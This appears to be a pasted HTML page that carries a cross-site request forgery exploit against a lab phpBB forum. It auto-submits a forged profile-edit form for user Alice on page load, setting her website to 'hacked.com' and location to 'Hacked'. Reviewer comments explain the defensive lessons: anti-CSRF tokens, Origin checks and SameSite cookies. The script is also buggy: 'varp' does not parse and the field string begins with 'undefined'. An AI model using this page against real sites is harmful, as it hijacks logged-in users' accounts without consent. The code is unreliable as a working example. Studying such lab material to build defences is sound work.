
Untitled

a guest
Feb 28th, 2020
  <!-- Review note: this page is a cross-site request forgery (CSRF) demonstration.
       Its script builds a form of hidden inputs and posts it to
       http://www.csrflabphpbb.com/ from the visitor's browser.
       Defensive reading: a state-changing endpoint should refuse such a request
       unless it carries an unpredictable per-session token, and should check the
       Origin or Referer header of incoming POSTs. -->
  1. <html>
  2. <body>
  3. <h1>
  4. Javascript
  5. </h1>
  6. <script type="text/javascript">
  // post(url, fields): creates a <form>, points it at `url`, fills it with the
  // markup string `fields`, attaches it to the document and submits it as an
  // HTTP POST in the current browsing context.
  //   url    - form action, i.e. the address the browser will POST to
  //   fields - HTML markup assigned to the form's innerHTML
  // NOTE(review): `varp` on listing line 9 is not a JavaScript keyword, so the
  // script as pasted does not parse.
  // Defensive reading: a form submitted this way is an ordinary browser request,
  // so the browser attaches whatever cookies its policy allows for the target
  // site; the receiving server cannot tell it from a genuine form post unless it
  // validates an anti-CSRF token or the Origin/Referer header.
  7. function post (url,fields)
  8. {
  9. varp p = document.createElement('form');
  10. p.action = url;
  // innerHTML parses `fields` as markup; safe here only because the caller
  // passes a constant string built in this file.
  11. p.innerHTML = fields;
  // '_self' loads the response in this same window or frame.
  12. p.target = '_self';
  13. p.method = 'post';
  14.  
  // A form must be in the document before submit() will send it.
  15. document.body.appendChild(p);
  16. p.submit();
  17. }
  // csrf_hack(): assembles the hidden inputs of a profile-edit request
  // (mode=editprofile, user_id=3, username Alice) and hands them to post().
  // The values that differ from blanks/defaults are website='hacked.com' and
  // location='Hacked'.
  // NOTE(review): `fields` is declared without an initial value, so the first
  // `+=` concatenates onto `undefined` and the string starts with "undefined".
  // Defensive reading:
  //  - None of the submitted fields looks like a per-session anti-CSRF token. If
  //    the target accepts this request it is authenticating on the session
  //    cookie alone; confirm against the target application.
  //  - cur_password is sent empty. If a profile edit succeeds that way, account
  //    changes are not gated on re-authentication; verify on the server side.
  //  - The destination is plain http, so the request also travels unencrypted.
  18. function csrf_hack()
  19. {
  20. var fields;
  21.  
  22. fields +="<input type='hidden' name='username' value='Alice'>";
  23. fields +="<input type='hidden' name='website' value='hacked.com'>";
  24. fields +="<input type='hidden' name='cur_password' value=''>";
  25. fields +="<input type='hidden' name='new_password' value=''>";
  26. fields +="<input type='hidden' name='password_confirm' value=''>";
  27. fields +="<input type='hidden' name='icq' value=''>";
  28. fields +="<input type='hidden' name='aim' value=''>";
  29. fields +="<input type='hidden' name='msn' value=''>";
  30. fields +="<input type='hidden' name='yim' value=''>";
  31. fields +="<input type='hidden' name='location' value='Hacked'>";
  32. fields +="<input type='hidden' name='occupation' value=''>";
  33. fields +="<input type='hidden' name='interests' value=''>";
  34. fields +="<input type='hidden' name='signature' value=''>";
  35. fields +="<input type='hidden' name='viewemail' value='0'>";
  36. fields +="<input type='hidden' name='hideonline' value='0'>";
  37. fields +="<input type='hidden' name='notifyreply' value='0'>";
  38. fields +="<input type='hidden' name='notifypm' value='1'>";
  39. fields +="<input type='hidden' name='popup_pm' value='1'>";
  40. fields +="<input type='hidden' name='attachsig' value='1'>";
  41. fields +="<input type='hidden' name='allowbbcode' value='1'>";
  42. fields +="<input type='hidden' name='allowhtml' value='0'>";
  43. fields +="<input type='hidden' name='allowsmilies' value='1'>";
  44. fields +="<input type='hidden' name='language' value='english'>";
  45. fields +="<input type='hidden' name='style' value='1'>";
  46. fields +="<input type='hidden' name='timezone' value='0'>";
  47. fields +="<input type='hidden' name='dateformat' value='D+M+d%2C+Y+g%3Ai+a'>";
  48. fields +="<input type='hidden' name='mode' value='editprofile'>";
  49. fields +="<input type='hidden' name='agreed' value='true'>";
  50. fields +="<input type='hidden' name='coppa' value='0'>";
  51. fields +="<input type='hidden' name='user_id' value='3'>";
  52. fields +="<input type='hidden' name='current_email' value='alice%40seed.com'>";
  53. fields +="<input type='hidden' name='Submit' value='Submit'>";
  // The assembled markup goes to post(), which submits it to the site root.
  54. post('http://www.csrflabphpbb.com/',fields);
  55.  
  56. }
  // Runs csrf_hack() as soon as the page finishes loading, so no click or other
  // visitor interaction is involved.
  // Defensive reading: because the request is fired automatically from another
  // origin, server-side checks are the control that matters. Session cookies set
  // with SameSite=Lax or SameSite=Strict are withheld from a cross-site form POST
  // like this, and a cross-site Origin header on a profile-edit POST is a useful
  // signal to log and reject.
  57. window.onload = function() {csrf_hack();}
  58. </script>
  59. </body>
  60. </html>